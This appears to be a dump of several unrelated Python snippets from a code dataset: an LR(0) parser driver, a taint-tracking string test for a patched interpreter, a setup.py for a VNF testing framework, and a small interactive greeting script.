    # program_regex = ProgramRegex()
    # program_regex.scan('src/step2/code.ry')
    # Parse the scanned token stream with an LR(0) parser; a non-None
    # configuration means the sequence was accepted.
    parser = LR0Parser(grammar, program)
    config = parser.parse(program.get_pif())
    if config is not None:
        print("Sequence: accepted!")
        print(program.get_code())
        print("Output stack: ", config.output_stack)
        parser.print_productions_list()
        Log.success("ACCEPT")
    # Disabled CLI mode: take the source file as a command-line argument
    # instead of the hard-coded path above.
    # parser = argparse.ArgumentParser()
    # parser.add_argument('file', help="The source program file")
    # args = parser.parse_args()
    # if os.path.exists(args.file):
    #     Log.info('Scanning file {0}\n'.format(args.file))
    #     program = Program()
    #     program.scan(args.file)
    #     print(program)
    # else:
    #     Log.error('File "{0}" does not exist.'.format(args.file))
| StarcoderdataPython |
3571879 | #!/home/nickolai/python/taint-2.6/python
import os
import sys
class Taint:
    """Taint label carried by strings: a plain list of taint tags."""

    def __init__(self, *l):
        # Materialise the tag arguments into a fresh, per-instance list.
        self.l = list(l)

    def merge(self, other):
        """Return a new Taint carrying this object's tags followed by
        *other*'s tags; neither operand is modified."""
        merged = Taint()
        merged.l = self.l + other.l
        return merged

    def export_check(self, f):
        # Intentionally a no-op hook, invoked by the taint-aware
        # interpreter when tainted data is exported.
        pass
def pt(s):
    # Print the (tainted) string and then the taint tags riding on it.
    # Python 2 syntax; the `__taint__` attribute only exists on the
    # taint-tracking interpreter named in the shebang.
    print s
    print s.__taint__.l
# Exercise string tainting.  `str.taint` is provided by the patched
# interpreter (see shebang); each string gets a distinct tag so the
# printed taint lists show how tags propagate.
x = "abc".taint(Taint(5))
y = "def".taint(Taint(6))
z = "ghi".taint(Taint(7))
x2 = "abc".taint(Taint(105))
y2 = "def".taint(Taint(106))
z2 = "ghi".taint(Taint(107))
# Concatenation should carry the merged tags of both operands.
pt(x+y)
pt(x2+y)
pt(x+z)
pt(x+z2)
a=x+y+z
pt(a)
# Taint should also survive chained intermediate assignments.
b=x+y
c=b+z
pt(c)
3339780 | <gh_stars>1-10
from setuptools import setup, find_packages
# Long description comes straight from the README.
with open("README.md") as f:
    readme = f.read()
# Single-source the release number: scrape __version__ from the package.
# NOTE(review): if gym/__init__.py has no __version__ line, `version` stays
# unbound and setup() below raises NameError — confirm that's acceptable.
with open("gym/__init__.py") as f:
    for line in f:
        if line.startswith("__version__"):
            version = line.split('"')[1]
setup(
    name="gym",
    # Fix: use the version parsed above; it was previously parsed and then
    # ignored in favour of a hard-coded "0.3.0", so releases could ship
    # with a stale version number.
    version=version,
    description="Gym - VNF Testing Framework",
    long_description=readme,
    long_description_content_type="text/markdown",
    author="<NAME>",
    packages=find_packages(exclude=("tests",)),
    namespace_packages=["gym"],
    include_package_data=True,
    keywords=["gym", "VNF", "test", "benchmark"],
    license="Apache License v2.0",
    url="https://github.com/raphaelvrosa/gym",
    download_url="https://github.com/raphaelvrosa/gym",
    classifiers=[
        "Development Status :: 4 - Beta",
        "Environment :: Other Environment",
        "Intended Audience :: Developers",
        "Operating System :: OS Independent",
        "Programming Language :: Python",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.7",
        "Topic :: Utilities",
        "License :: OSI Approved :: Apache Software License",
    ],
    scripts=[
        "gym/agent/gym-agent",
        "gym/monitor/gym-monitor",
        "gym/manager/gym-manager",
        "gym/player/gym-player",
        "gym/infra/gym-infra",
        "gym/cli/gym-cli",
    ],
    install_requires=[
        "asyncio<=3.4.3",
        "protobuf<=3.12.2",
        "grpclib<=0.3.2",
        "grpcio-tools<=1.31.0",
        "pyang<=2.3.2",
        "pyangbind<=0.8.1",
        "jinja2<=2.11.2",
        "PyYAML<=5.3.1",
        "pandas<=1.1.0",
        "docker<=4.1.0",
        "psutil<=5.7.0",
        "paramiko<=2.6.0",
        "scp<=0.13.2",
        "prompt_toolkit==3.0.6",
        "influxdb==5.3.0",
        "aiohttp==3.6.2",
    ],
    python_requires=">=3.7",
    setup_requires=["setuptools>=41.1.0"],
)
| StarcoderdataPython |
# Tiny interactive greeter: ask for a name and an age, then tease the user.
print("Hello User")
name = input("What is your name?")
print(f"Hello {name}!")
age_reply = input("What is your age?")
is_elder = int(age_reply) > 50
if is_elder:
    print("Ah... A well traveled soul are ye.")
else:
    print("Awwww you're just a baby")
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.